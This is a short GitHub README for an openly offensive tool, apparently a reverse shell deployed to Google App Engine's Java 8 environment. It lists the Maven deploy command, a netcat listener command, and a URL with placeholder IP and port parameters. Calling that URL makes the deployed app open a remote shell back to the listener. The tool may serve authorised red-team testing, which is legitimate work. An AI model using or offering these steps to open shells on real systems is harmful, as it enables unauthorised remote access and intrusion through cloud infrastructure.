Skip to content

Latest commit

 

History

History
17 lines (10 loc) · 372 Bytes

README.md

File metadata and controls

17 lines (10 loc) · 372 Bytes

GAE Reverse Shell

Google App Engine reverse shell (Standard Java 8 environment)

Deploy:

mvn appengine:deploy

Run in terminal:

nc -lv <PORT>

Open in browser:

http://<APP>.appspot.com/shell?addr=<IP>&port=<PORT>

BusyBox license

BusyBox source-code used